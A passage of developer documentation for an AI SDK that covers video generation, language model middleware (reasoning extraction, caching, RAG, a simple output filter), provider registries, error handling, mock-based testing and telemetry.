    } satisfies FalVideoModelOptions,
  },
});

Custom Headers

experimental_generateVideo accepts an optional headers parameter of type Record<string, string> that you can use to add custom headers to the video generation request.

import { experimental_generateVideo as generateVideo } from 'ai';
__PROVIDER_IMPORT__;

const { video } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A cat walking on a treadmill',
  headers: { 'X-Custom-Header': 'custom-value' },
});

Warnings

If the model returns warnings, e.g. for unsupported parameters, they will be available in the warnings property of the response.

const { video, warnings } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A cat walking on a treadmill',
});

Additional Provider-specific Metadata

Some providers expose additional metadata for the result overall or per video.

const prompt = 'A cat walking on a treadmill';

const { video, providerMetadata } = await generateVideo({
  model: fal.video('luma-dream-machine/ray-2'),
  prompt,
});

// Access provider-specific metadata
const videoMetadata = providerMetadata.fal?.videos[0];
console.log({
  duration: videoMetadata?.duration,
  fps: videoMetadata?.fps,
  width: videoMetadata?.width,
  height: videoMetadata?.height,
});

The outer key of the returned providerMetadata is the provider name. The inner values are the metadata. A videos key is typically present in the metadata and is an array with the same length as the top level videos key.

When generating multiple videos with n > 1, you can also access per-call metadata through the responses array:

const { videos, responses } = await generateVideo({
  model: __VIDEO_MODEL__,
  prompt: 'A rocket launching into space',
  n: 5, // May require multiple API calls
});

// Access metadata from each individual API call
for (const response of responses) {
  console.log({
    timestamp: response.timestamp,
    modelId: response.modelId,
    // Per-call provider metadata (lossless)
    providerMetadata: response.providerMetadata,
  });
}

Error Handling

When experimental_generateVideo cannot generate a valid video, it throws a AI_NoVideoGeneratedError.

This error occurs when the AI provider fails to generate a video. It can arise due to the following reasons:

The model failed to generate a response
The model generated a response that could not be parsed

The error preserves the following information to help you log the issue:

responses: Metadata about the video model responses, including timestamp, model, and headers.
cause: The cause of the error. You can use this for more detailed error handling

import {
  experimental_generateVideo as generateVideo,
  NoVideoGeneratedError,
} from 'ai';

try {
  await generateVideo({ model, prompt });
} catch (error) {
  if (NoVideoGeneratedError.isInstance(error)) {
    console.log('NoVideoGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Responses:', error.responses);
  }
}

Video Models

Provider	Model	Features
FAL	`luma-dream-machine/ray-2`	Text-to-video, image-to-video
FAL	`minimax-video`	Text-to-video
Google	`veo-2.0-generate-001`	Text-to-video, up to 4 videos per call
Google Vertex	`veo-3.1-generate-001`	Text-to-video, audio generation
Google Vertex	`veo-3.1-fast-generate-001`	Text-to-video, audio generation
Google Vertex	`veo-3.0-generate-001`	Text-to-video, audio generation
Google Vertex	`veo-3.0-fast-generate-001`	Text-to-video, audio generation
Google Vertex	`veo-2.0-generate-001`	Text-to-video, up to 4 videos per call
Kling AI	`kling-v2.6-t2v`	Text-to-video
Kling AI	`kling-v2.6-i2v`	Image-to-video
Kling AI	`kling-v2.6-motion-control`	Motion control
Replicate	`minimax/video-01`	Text-to-video
xAI	`grok-imagine-video`	Text-to-video, image-to-video, editing, extension, R2V

Above are a small subset of the video models supported by the AI SDK providers. For more, see the respective provider documentation.

title: Language Model Middleware description: Learn how to use middleware to enhance the behavior of language models

Language Model Middleware

Language model middleware is a way to enhance the behavior of language models by intercepting and modifying the calls to the language model.

Using Language Model Middleware

import { wrapLanguageModel, streamText } from 'ai';

const wrappedLanguageModel = wrapLanguageModel({
  model: yourModel,
  middleware: yourLanguageModelMiddleware,
});

The wrapped language model can be used just like any other language model, e.g. in streamText:

const result = streamText({
  model: wrappedLanguageModel,
  prompt: 'What cities are in the United States?',
});

Multiple middlewares

You can provide multiple middlewares to the wrapLanguageModel function. The middlewares will be applied in the order they are provided.

const wrappedLanguageModel = wrapLanguageModel({
  model: yourModel,
  middleware: [firstMiddleware, secondMiddleware],
});

// applied as: firstMiddleware(secondMiddleware(yourModel))

Built-in Middleware

The AI SDK comes with several built-in middlewares that you can use to configure language models:

extractReasoningMiddleware: Extracts reasoning information from the generated text and exposes it as a reasoning property on the result.
extractJsonMiddleware: Extracts JSON from text content by stripping markdown code fences. Useful when using Output.object() with models that wrap JSON responses in code blocks.
simulateStreamingMiddleware: Simulates streaming behavior with responses from non-streaming language models.
defaultSettingsMiddleware: Applies default settings to a language model.
addToolInputExamplesMiddleware: Adds tool input examples to tool descriptions for providers that don't natively support the inputExamples property.

Extract Reasoning

Some providers and models expose reasoning information in the generated text using special tags, e.g. <think> and </think>.

The extractReasoningMiddleware function can be used to extract this reasoning information and expose it as a reasoning property on the result.

import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: extractReasoningMiddleware({ tagName: 'think' }),
});

You can then use that enhanced model in functions like generateText and streamText.

Extract JSON

Some models wrap JSON responses in markdown code fences (e.g., ```json ... ```) even when you request structured output.

The extractJsonMiddleware function strips these code fences from the response, making it compatible with Output.object().

import {
  wrapLanguageModel,
  extractJsonMiddleware,
  Output,
  generateText,
} from 'ai';
import { z } from 'zod';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: extractJsonMiddleware(),
});

const result = await generateText({
  model,
  output: Output.object({
    schema: z.object({
      name: z.string(),
      ingredients: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a recipe.',
});

You can also provide a custom transform function for models that use different formatting:

const model = wrapLanguageModel({
  model: yourModel,
  middleware: extractJsonMiddleware({
    transform: text => text.replace(/^PREFIX/, '').replace(/SUFFIX$/, ''),
  }),
});

Simulate Streaming

import { wrapLanguageModel, simulateStreamingMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: simulateStreamingMiddleware(),
});

Default Settings

The defaultSettingsMiddleware function can be used to apply default settings to a language model.

import { wrapLanguageModel, defaultSettingsMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: defaultSettingsMiddleware({
    settings: {
      temperature: 0.5,
      maxOutputTokens: 800,
      providerOptions: { openai: { store: false } },
    },
  }),
});

Add Tool Input Examples

The addToolInputExamplesMiddleware function adds tool input examples to tool descriptions. This is useful for providers that don't natively support the inputExamples property on tools. The middleware serializes the examples into the tool's description text so models can still benefit from seeing example inputs.

import { wrapLanguageModel, addToolInputExamplesMiddleware } from 'ai';

const model = wrapLanguageModel({
  model: yourModel,
  middleware: addToolInputExamplesMiddleware({
    prefix: 'Input Examples:',
  }),
});

When you define a tool with inputExamples, the middleware will append them to the tool's description:

import { generateText, tool } from 'ai';
import { z } from 'zod';

const result = await generateText({
  model, // wrapped model from above
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      inputSchema: z.object({
        location: z.string(),
      }),
      inputExamples: [
        { input: { location: 'San Francisco' } },
        { input: { location: 'London' } },
      ],
    }),
  },
  prompt: 'What is the weather in Tokyo?',
});

The tool description will be transformed to:

Get the weather in a location

Input Examples:
{"location":"San Francisco"}
{"location":"London"}

Options

prefix (optional): A prefix text to prepend before the examples. Default: 'Input Examples:'.
format (optional): A custom formatter function for each example. Receives the example object and its index. Default: JSON.stringify(example.input).
remove (optional): Whether to remove the inputExamples property from the tool after adding them to the description. Default: true.

const model = wrapLanguageModel({
  model: yourModel,
  middleware: addToolInputExamplesMiddleware({
    prefix: 'Input Examples:',
    format: (example, index) =>
      `${index + 1}. ${JSON.stringify(example.input)}`,
    remove: true,
  }),
});

Community Middleware

The AI SDK provides a Language Model Middleware specification. Community members can develop middleware that adheres to this specification, making it compatible with the AI SDK ecosystem.

Here are some community middlewares that you can explore:

Custom tool call parser

The @ai-sdk-tool/parser package offers three middleware variants:

createToolMiddleware: A flexible function for creating custom tool call middleware tailored to specific models
hermesToolMiddleware: Ready-to-use middleware for Hermes & Qwen format function calls
gemmaToolMiddleware: Pre-configured middleware for Gemma 3 model series function call format

Here's how you can enable function calls with Gemma models that don't support them natively:

import { wrapLanguageModel } from 'ai';
import { gemmaToolMiddleware } from '@ai-sdk-tool/parser';

const model = wrapLanguageModel({
  model: openrouter('google/gemma-3-27b-it'),
  middleware: gemmaToolMiddleware,
});

Find more examples at this link.

Implementing Language Model Middleware

You can implement any of the following three function to modify the behavior of the language model:

transformParams: Transforms the parameters before they are passed to the language model, for both doGenerate and doStream.
wrapGenerate: Wraps the doGenerate method of the language model. You can modify the parameters, call the language model, and modify the result.
wrapStream: Wraps the doStream method of the language model. You can modify the parameters, call the language model, and modify the result.

Here are some examples of how to implement language model middleware:

Examples

Logging

This example shows how to log the parameters and generated text of a language model call.

import type {
  LanguageModelV3Middleware,
  LanguageModelV3StreamPart,
} from '@ai-sdk/provider';

export const yourLogMiddleware: LanguageModelV3Middleware = {
  wrapGenerate: async ({ doGenerate, params }) => {
    console.log('doGenerate called');
    console.log(`params: ${JSON.stringify(params, null, 2)}`);

    const result = await doGenerate();

    console.log('doGenerate finished');
    console.log(`generated text: ${result.text}`);

    return result;
  },

  wrapStream: async ({ doStream, params }) => {
    console.log('doStream called');
    console.log(`params: ${JSON.stringify(params, null, 2)}`);

    const { stream, ...rest } = await doStream();

    let generatedText = '';
    const textBlocks = new Map<string, string>();

    const transformStream = new TransformStream<
      LanguageModelV3StreamPart,
      LanguageModelV3StreamPart
    >({
      transform(chunk, controller) {
        switch (chunk.type) {
          case 'text-start': {
            textBlocks.set(chunk.id, '');
            break;
          }
          case 'text-delta': {
            const existing = textBlocks.get(chunk.id) || '';
            textBlocks.set(chunk.id, existing + chunk.delta);
            generatedText += chunk.delta;
            break;
          }
          case 'text-end': {
            console.log(
              `Text block ${chunk.id} completed:`,
              textBlocks.get(chunk.id),
            );
            break;
          }
        }

        controller.enqueue(chunk);
      },

      flush() {
        console.log('doStream finished');
        console.log(`generated text: ${generatedText}`);
      },
    });

    return {
      stream: stream.pipeThrough(transformStream),
      ...rest,
    };
  },
};

Caching

This example shows how to build a simple cache for the generated text of a language model call.

import type { LanguageModelV3Middleware } from '@ai-sdk/provider';

const cache = new Map<string, any>();

export const yourCacheMiddleware: LanguageModelV3Middleware = {
  wrapGenerate: async ({ doGenerate, params }) => {
    const cacheKey = JSON.stringify(params);

    if (cache.has(cacheKey)) {
      return cache.get(cacheKey);
    }

    const result = await doGenerate();

    cache.set(cacheKey, result);

    return result;
  },

  // here you would implement the caching logic for streaming
};

Retrieval Augmented Generation (RAG)

This example shows how to use RAG as middleware.

import type { LanguageModelV3Middleware } from '@ai-sdk/provider';

export const yourRagMiddleware: LanguageModelV3Middleware = {
  transformParams: async ({ params }) => {
    const lastUserMessageText = getLastUserMessageText({
      prompt: params.prompt,
    });

    if (lastUserMessageText == null) {
      return params; // do not use RAG (send unmodified parameters)
    }

    const instruction =
      'Use the following information to answer the question:\n' +
      findSources({ text: lastUserMessageText })
        .map(chunk => JSON.stringify(chunk))
        .join('\n');

    return addToLastUserMessage({ params, text: instruction });
  },
};

Guardrails

Guard rails are a way to ensure that the generated text of a language model call is safe and appropriate. This example shows how to use guardrails as middleware.

import type { LanguageModelV3Middleware } from '@ai-sdk/provider';

export const yourGuardrailMiddleware: LanguageModelV3Middleware = {
  wrapGenerate: async ({ doGenerate }) => {
    const { text, ...rest } = await doGenerate();

    // filtering approach, e.g. for PII or other sensitive information:
    const cleanedText = text?.replace(/badword/g, '<REDACTED>');

    return { text: cleanedText, ...rest };
  },

  // here you would implement the guardrail logic for streaming
  // Note: streaming guardrails are difficult to implement, because
  // you do not know the full content of the stream until it's finished.
};

Configuring Per Request Custom Metadata

import { generateText, wrapLanguageModel } from 'ai';
__PROVIDER_IMPORT__;
import type { LanguageModelV3Middleware } from '@ai-sdk/provider';

export const yourLogMiddleware: LanguageModelV3Middleware = {
  wrapGenerate: async ({ doGenerate, params }) => {
    console.log('METADATA', params?.providerMetadata?.yourLogMiddleware);
    const result = await doGenerate();
    return result;
  },
};

const { text } = await generateText({
  model: wrapLanguageModel({
    model: __MODEL__,
    middleware: yourLogMiddleware,
  }),
  prompt: 'Invent a new holiday and describe its traditions.',
  providerOptions: {
    yourLogMiddleware: {
      hello: 'world',
    },
  },
});

console.log(text);

title: Provider & Model Management description: Learn how to work with multiple providers and models

Provider & Model Management

When you work with multiple providers and models, it is often desirable to manage them in a central place and access the models through simple string ids.

The AI SDK offers custom providers and a provider registry for this purpose:

With custom providers, you can pre-configure model settings, provide model name aliases, and limit the available models.
The provider registry lets you mix multiple providers and access them through simple string ids.

You can mix and match custom providers, the provider registry, and middleware in your application.

Custom Providers

You can create a custom provider using customProvider.

Example: custom model settings

You might want to override the default model settings for a provider or provide model name aliases with pre-configured settings.

import {
  gateway,
  customProvider,
  defaultSettingsMiddleware,
  wrapLanguageModel,
} from 'ai';

// custom provider with different provider options:
export const openai = customProvider({
  languageModels: {
    // replacement model with custom provider options:
    'gpt-5.1': wrapLanguageModel({
      model: gateway('openai/gpt-5.1'),
      middleware: defaultSettingsMiddleware({
        settings: {
          providerOptions: {
            openai: {
              reasoningEffort: 'high',
            },
          },
        },
      }),
    }),
    // alias model with custom provider options:
    'gpt-5.1-high-reasoning': wrapLanguageModel({
      model: gateway('openai/gpt-5.1'),
      middleware: defaultSettingsMiddleware({
        settings: {
          providerOptions: {
            openai: {
              reasoningEffort: 'high',
            },
          },
        },
      }),
    }),
  },
  fallbackProvider: gateway,
});

Example: model name alias

You can also provide model name aliases, so you can update the model version in one place in the future:

import { customProvider, gateway } from 'ai';

// custom provider with alias names:
export const anthropic = customProvider({
  languageModels: {
    opus: gateway('anthropic/claude-opus-4.1'),
    sonnet: gateway('anthropic/claude-sonnet-4.5'),
    haiku: gateway('anthropic/claude-haiku-4.5'),
  },
  fallbackProvider: gateway,
});

Example: limit available models

You can limit the available models in the system, even if you have multiple providers.

import {
  customProvider,
  defaultSettingsMiddleware,
  wrapLanguageModel,
  gateway,
} from 'ai';

export const myProvider = customProvider({
  languageModels: {
    'text-medium': gateway('anthropic/claude-3-5-sonnet-20240620'),
    'text-small': gateway('openai/gpt-5-mini'),
    'reasoning-medium': wrapLanguageModel({
      model: gateway('openai/gpt-5.1'),
      middleware: defaultSettingsMiddleware({
        settings: {
          providerOptions: {
            openai: {
              reasoningEffort: 'high',
            },
          },
        },
      }),
    }),
    'reasoning-fast': wrapLanguageModel({
      model: gateway('openai/gpt-5.1'),
      middleware: defaultSettingsMiddleware({
        settings: {
          providerOptions: {
            openai: {
              reasoningEffort: 'low',
            },
          },
        },
      }),
    }),
  },
  embeddingModels: {
    embedding: gateway.embeddingModel('openai/text-embedding-3-small'),
  },
  // no fallback provider
});

Provider Registry

You can create a provider registry with multiple providers and models using createProviderRegistry.

Setup

import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { createProviderRegistry, gateway } from 'ai';

export const registry = createProviderRegistry({
  // register provider with prefix and default setup using gateway:
  gateway,

  // register provider with prefix and direct provider import:
  anthropic,
  openai,
});

Setup with Custom Separator

By default, the registry uses : as the separator between provider and model IDs. You can customize this separator:

import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { createProviderRegistry, gateway } from 'ai';

export const customSeparatorRegistry = createProviderRegistry(
  {
    gateway,
    anthropic,
    openai,
  },
  { separator: ' > ' },
);

Example: Use language models

You can access language models by using the languageModel method on the registry. The provider id will become the prefix of the model id: providerId:modelId.

import { generateText } from 'ai';
import { registry } from './registry';

const { text } = await generateText({
  model: registry.languageModel('openai:gpt-5.1'), // default separator
  // or with custom separator:
  // model: customSeparatorRegistry.languageModel('openai > gpt-5.1'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

Example: Use text embedding models

You can access text embedding models by using the .embeddingModel method on the registry. The provider id will become the prefix of the model id: providerId:modelId.

import { embed } from 'ai';
import { registry } from './registry';

const { embedding } = await embed({
  model: registry.embeddingModel('openai:text-embedding-3-small'),
  value: 'sunny day at the beach',
});

Example: Use image models

You can access image models by using the imageModel method on the registry. The provider id will become the prefix of the model id: providerId:modelId.

import { generateImage } from 'ai';
import { registry } from './registry';

const { image } = await generateImage({
  model: registry.imageModel('openai:dall-e-3'),
  prompt: 'A beautiful sunset over a calm ocean',
});

Combining Custom Providers, Provider Registry, and Middleware

Here is an example that implements the following concepts:

pass through gateway with a namespace prefix (here: gateway > *)
pass through a full provider with a namespace prefix (here: xai > *)
setup an OpenAI-compatible provider with custom api key and base URL (here: custom > *)
setup model name aliases (here: anthropic > fast, anthropic > writing, anthropic > reasoning)
pre-configure model settings (here: anthropic > reasoning)
validate the provider-specific options (here: AnthropicLanguageModelOptions)
use a fallback provider (here: anthropic > *)
limit a provider to certain models without a fallback (here: groq > gemma2-9b-it, groq > qwen-qwq-32b)
define a custom separator for the provider registry (here: >)

import { anthropic, AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { xai } from '@ai-sdk/xai';
import { groq } from '@ai-sdk/groq';
import {
  createProviderRegistry,
  customProvider,
  defaultSettingsMiddleware,
  gateway,
  wrapLanguageModel,
} from 'ai';

export const registry = createProviderRegistry(
  {
    // pass through gateway with a namespace prefix
    gateway,

    // pass through full providers with namespace prefixes
    xai,

    // access an OpenAI-compatible provider with custom setup
    custom: createOpenAICompatible({
      name: 'provider-name',
      apiKey: process.env.CUSTOM_API_KEY,
      baseURL: 'https://api.custom.com/v1',
    }),

    // setup model name aliases
    anthropic: customProvider({
      languageModels: {
        fast: anthropic('claude-haiku-4-5'),

        // simple model
        writing: anthropic('claude-sonnet-4-5'),

        // extended reasoning model configuration:
        reasoning: wrapLanguageModel({
          model: anthropic('claude-sonnet-4-5'),
          middleware: defaultSettingsMiddleware({
            settings: {
              maxOutputTokens: 100000, // example default setting
              providerOptions: {
                anthropic: {
                  thinking: {
                    type: 'enabled',
                    budgetTokens: 32000,
                  },
                } satisfies AnthropicLanguageModelOptions,
              },
            },
          }),
        }),
      },
      fallbackProvider: anthropic,
    }),

    // limit a provider to certain models without a fallback
    groq: customProvider({
      languageModels: {
        'gemma2-9b-it': groq('gemma2-9b-it'),
        'qwen-qwq-32b': groq('qwen-qwq-32b'),
      },
    }),
  },
  { separator: ' > ' },
);

// usage:
const model = registry.languageModel('anthropic > reasoning');

Global Provider Configuration

The AI SDK 5 includes a global provider feature that allows you to specify a model using just a plain model ID string:

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const result = await streamText({
  model: __MODEL__, // Uses the global provider (defaults to gateway)
  prompt: 'Invent a new holiday and describe its traditions.',
});

By default, the global provider is set to the Vercel AI Gateway.

Customizing the Global Provider

You can set your own preferred global provider:

import { openai } from '@ai-sdk/openai';

// Initialize once during startup:
globalThis.AI_SDK_DEFAULT_PROVIDER = openai;

import { streamText } from 'ai';

const result = await streamText({
  model: 'gpt-5.1', // Uses OpenAI provider without prefix
  prompt: 'Invent a new holiday and describe its traditions.',
});

This simplifies provider usage and makes it easier to switch between providers without changing your model references throughout your codebase.

title: Error Handling description: Learn how to handle errors in the AI SDK Core

Error Handling

Handling regular errors

Regular errors are thrown and can be handled using the try/catch block.

import { generateText } from 'ai';
__PROVIDER_IMPORT__;

try {
  const { text } = await generateText({
    model: __MODEL__,
    prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  });
} catch (error) {
  // handle error
}

See Error Types for more information on the different types of errors that may be thrown.

Handling streaming errors (simple streams)

When errors occur during streams that do not support error chunks, the error is thrown as a regular error. You can handle these errors using the try/catch block.

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

try {
  const { textStream } = streamText({
    model: __MODEL__,
    prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  });

  for await (const textPart of textStream) {
    process.stdout.write(textPart);
  }
} catch (error) {
  // handle error
}

Handling streaming errors (streaming with `error` support)

Full streams support error parts. You can handle those parts similar to other parts. It is recommended to also add a try-catch block for errors that happen outside of the streaming.

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

try {
  const { fullStream } = streamText({
    model: __MODEL__,
    prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  });

  for await (const part of fullStream) {
    switch (part.type) {
      // ... handle other part types

      case 'error': {
        const error = part.error;
        // handle error
        break;
      }

      case 'abort': {
        // handle stream abort
        break;
      }

      case 'tool-error': {
        const error = part.error;
        // handle error
        break;
      }
    }
  }
} catch (error) {
  // handle error
}

Handling stream aborts

When streams are aborted (e.g., via chat stop button), you may want to perform cleanup operations like updating stored messages in your UI. Use the onAbort callback to handle these cases.

The onAbort callback is called when a stream is aborted via AbortSignal, but onFinish is not called. This ensures you can still update your UI state appropriately.

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const { textStream } = streamText({
  model: __MODEL__,
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  onAbort: ({ steps }) => {
    // Update stored messages or perform cleanup
    console.log('Stream aborted after', steps.length, 'steps');
  },
  onFinish: ({ steps, totalUsage }) => {
    // This is called on normal completion
    console.log('Stream completed normally');
  },
});

for await (const textPart of textStream) {
  process.stdout.write(textPart);
}

The onAbort callback receives:

steps: An array of all completed steps before the abort

You can also handle abort events directly in the stream:

import { streamText } from 'ai';
__PROVIDER_IMPORT__;

const { fullStream } = streamText({
  model: __MODEL__,
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

for await (const chunk of fullStream) {
  switch (chunk.type) {
    case 'abort': {
      // Handle abort directly in stream
      console.log('Stream was aborted');
      break;
    }
    // ... handle other part types
  }
}

title: Testing description: Learn how to use AI SDK Core mock providers for testing.

Testing

Testing language models can be challenging, because they are non-deterministic and calling them is slow and expensive.

To enable you to unit test your code that uses the AI SDK, the AI SDK Core includes mock providers and test helpers. You can import the following helpers from ai/test:

MockEmbeddingModelV3: A mock embedding model using the embedding model v3 specification.
MockLanguageModelV3: A mock language model using the language model v3 specification.
mockId: Provides an incrementing integer ID.
mockValues: Iterates over an array of values with each call. Returns the last value when the array is exhausted.

You can also import simulateReadableStream from ai to simulate a readable stream with delays.

With mock providers and test helpers, you can control the output of the AI SDK and test your code in a repeatable and deterministic way without actually calling a language model provider.

Examples

You can use the test helpers with the AI Core functions in your unit tests:

generateText

import { generateText } from 'ai';
import { MockLanguageModelV3 } from 'ai/test';

const result = await generateText({
  model: new MockLanguageModelV3({
    doGenerate: async () => ({
      content: [{ type: 'text', text: `Hello, world!` }],
      finishReason: { unified: 'stop', raw: undefined },
      usage: {
        inputTokens: {
          total: 10,
          noCache: 10,
          cacheRead: undefined,
          cacheWrite: undefined,
        },
        outputTokens: {
          total: 20,
          text: 20,
          reasoning: undefined,
        },
      },
      warnings: [],
    }),
  }),
  prompt: 'Hello, test!',
});

streamText

import { streamText, simulateReadableStream } from 'ai';
import { MockLanguageModelV3 } from 'ai/test';

const result = streamText({
  model: new MockLanguageModelV3({
    doStream: async () => ({
      stream: simulateReadableStream({
        chunks: [
          { type: 'text-start', id: 'text-1' },
          { type: 'text-delta', id: 'text-1', delta: 'Hello' },
          { type: 'text-delta', id: 'text-1', delta: ', ' },
          { type: 'text-delta', id: 'text-1', delta: 'world!' },
          { type: 'text-end', id: 'text-1' },
          {
            type: 'finish',
            finishReason: { unified: 'stop', raw: undefined },
            logprobs: undefined,
            usage: {
              inputTokens: {
                total: 3,
                noCache: 3,
                cacheRead: undefined,
                cacheWrite: undefined,
              },
              outputTokens: {
                total: 10,
                text: 10,
                reasoning: undefined,
              },
            },
          },
        ],
      }),
    }),
  }),
  prompt: 'Hello, test!',
});

generateText with Output

import { generateText, Output } from 'ai';
import { MockLanguageModelV3 } from 'ai/test';
import { z } from 'zod';

const result = await generateText({
  model: new MockLanguageModelV3({
    doGenerate: async () => ({
      content: [{ type: 'text', text: `{"content":"Hello, world!"}` }],
      finishReason: { unified: 'stop', raw: undefined },
      usage: {
        inputTokens: {
          total: 10,
          noCache: 10,
          cacheRead: undefined,
          cacheWrite: undefined,
        },
        outputTokens: {
          total: 20,
          text: 20,
          reasoning: undefined,
        },
      },
      warnings: [],
    }),
  }),
  output: Output.object({ schema: z.object({ content: z.string() }) }),
  prompt: 'Hello, test!',
});

streamText with Output

import { streamText, Output, simulateReadableStream } from 'ai';
import { MockLanguageModelV3 } from 'ai/test';
import { z } from 'zod';

const result = streamText({
  model: new MockLanguageModelV3({
    doStream: async () => ({
      stream: simulateReadableStream({
        chunks: [
          { type: 'text-start', id: 'text-1' },
          { type: 'text-delta', id: 'text-1', delta: '{ ' },
          { type: 'text-delta', id: 'text-1', delta: '"content": ' },
          { type: 'text-delta', id: 'text-1', delta: `"Hello, ` },
          { type: 'text-delta', id: 'text-1', delta: `world` },
          { type: 'text-delta', id: 'text-1', delta: `!"` },
          { type: 'text-delta', id: 'text-1', delta: ' }' },
          { type: 'text-end', id: 'text-1' },
          {
            type: 'finish',
            finishReason: { unified: 'stop', raw: undefined },
            logprobs: undefined,
            usage: {
              inputTokens: {
                total: 3,
                noCache: 3,
                cacheRead: undefined,
                cacheWrite: undefined,
              },
              outputTokens: {
                total: 10,
                text: 10,
                reasoning: undefined,
              },
            },
          },
        ],
      }),
    }),
  }),
  output: Output.object({ schema: z.object({ content: z.string() }) }),
  prompt: 'Hello, test!',
});

Simulate UI Message Stream Responses

You can also simulate UI Message Stream responses for testing, debugging, or demonstration purposes.

Here is a Next example:

import { simulateReadableStream } from 'ai';

export async function POST(req: Request) {
  return new Response(
    simulateReadableStream({
      initialDelayInMs: 1000, // Delay before the first chunk
      chunkDelayInMs: 300, // Delay between chunks
      chunks: [
        `data: {"type":"start","messageId":"msg-123"}\n\n`,
        `data: {"type":"text-start","id":"text-1"}\n\n`,
        `data: {"type":"text-delta","id":"text-1","delta":"This"}\n\n`,
        `data: {"type":"text-delta","id":"text-1","delta":" is an"}\n\n`,
        `data: {"type":"text-delta","id":"text-1","delta":" example."}\n\n`,
        `data: {"type":"text-end","id":"text-1"}\n\n`,
        `data: {"type":"finish"}\n\n`,
        `data: [DONE]\n\n`,
      ],
    }).pipeThrough(new TextEncoderStream()),
    {
      status: 200,
      headers: {
        'Content-Type': 'text/event-stream',
        'Cache-Control': 'no-cache',
        Connection: 'keep-alive',
        'x-vercel-ai-ui-message-stream': 'v1',
      },
    },
  );
}

title: Telemetry description: Using OpenTelemetry with AI SDK Core

Telemetry

The AI SDK uses OpenTelemetry to collect telemetry data. OpenTelemetry is an open-source observability framework designed to provide standardized instrumentation for collecting telemetry data.

Check out the AI SDK Observability Integrations to see providers that offer monitoring and tracing for AI SDK applications.

Enabling telemetry

For Next.js applications, please follow the Next.js OpenTelemetry guide to enable telemetry first.

You can then use the experimental_telemetry option to enable telemetry on specific function calls while the feature is experimental:

const result = await generateText({
  model: __MODEL__,
  prompt: 'Write a short story about a cat.',
  experimental_telemetry: { isEnabled: true },
});

Telemetry Metadata

You can provide a functionId to identify the function that the telemetry data is for, and metadata to include additional information in the telemetry data.

const result = await generateText({
  model: __MODEL__,
  prompt: 'Write a short story about a cat.',
  experimental_telemetry: {
    isEnabled: true,
    functionId: 'my-awesome-function',
    metadata: {
      something: 'custom',
      someOtherThing: 'other-value',
    },
  },
});

Custom Tracer

const tracerProvider = new NodeTracerProvider();
const result = await generateText({
  model: __MODEL__,
  prompt: 'Write a short story about a cat.',
  experimental_telemetry: {
    isEnabled: true,
    tracer: tracerProvider.getTracer('ai'),
  },
});

Telemetry Integrations

Telemetry integrations let you hook into the generation lifecycle to build custom observability — logging, analytics, DevTools, or any other monitoring system. Instead of wiring up individual callbacks on every call, you implement a TelemetryIntegration once and pass it via experimental_telemetry.integrations.

Using an integration

Pass one or more integrations to any generateText or streamText call:

import { streamText } from 'ai';
import { devToolsIntegration } from '@ai-sdk/devtools';

const result = streamText({
  model: openai('gpt-4o'),
  prompt: 'Hello!',
  experimental_telemetry: {
    isEnabled: true,
    integrations: [devToolsIntegration()],
  },
});

You can combine multiple integrations — they all receive the same lifecycle events:

experimental_telemetry: {
  isEnabled: true,
  integrations: [devToolsIntegration(), otelIntegration(), customLogger()],
},

Errors inside integrations are caught and do not break the generation flow.

Building a custom integration

Implement the TelemetryIntegration interface from the ai package. All methods are optional — implement only the lifecycle events you care about:

import type { TelemetryIntegration } from 'ai';
import { bindTelemetryIntegration } from 'ai';

class MyIntegration implements TelemetryIntegration {
  async onStart(event) {
    console.log('Generation started:', event.model.modelId);
  }

  async onStepFinish(event) {
    console.log(
      `Step ${event.stepNumber} done:`,
      event.usage.totalTokens,
      'tokens',
    );
  }

  async onToolCallFinish(event) {
    if (event.success) {
      console.log(
        `Tool "${event.toolCall.toolName}" took ${event.durationMs}ms`,
      );
    } else {
      console.error(`Tool "${event.toolCall.toolName}" failed:`, event.error);
    }
  }

  async onFinish(event) {
    console.log('Done. Total tokens:', event.totalUsage.totalTokens);
  }
}

export function myIntegration(): TelemetryIntegration {
  return bindTelemetryIntegration(new MyIntegration());
}

Use bindTelemetryIntegration for class-based integrations to ensure this is correctly bound when methods are extracted and called as callbacks.

Available lifecycle methods

<PropertiesTable content={[ { name: 'onStart', type: '(event: OnStartEvent) => void | PromiseLike', description: 'Called when the generation operation begins, before any LLM calls.', }, { name: 'onStepStart', type: '(event: OnStepStartEvent) => void | PromiseLike', description: 'Called when a step (LLM call) begins, before the provider is called.', }, { name: 'onToolCallStart', type: '(event: OnToolCallStartEvent) => void | PromiseLike', description: "Called when a tool's execute function is about to run.", }, { name: 'onToolCallFinish', type: '(event: OnToolCallFinishEvent) => void | PromiseLike', description: "Called when a tool's execute function completes or errors.", }, { name: 'onStepFinish', type: '(event: OnStepFinishEvent) => void | PromiseLike', description: 'Called when a step (LLM call) completes.', }, { name: 'onFinish', type: '(event: OnFinishEvent) => void | PromiseLike', description: 'Called when the entire generation completes (all steps finished).', }, ]} />

The event types for each method are the same as the corresponding event callbacks. See the event callbacks documentation for the full property reference of each event.

Collected Data

generateText function

generateText records 3 types of spans:

ai.generateText (span): the full length of the generateText call. It contains 1 or more ai.generateText.doGenerate spans. It contains the basic LLM span information and the following attributes:
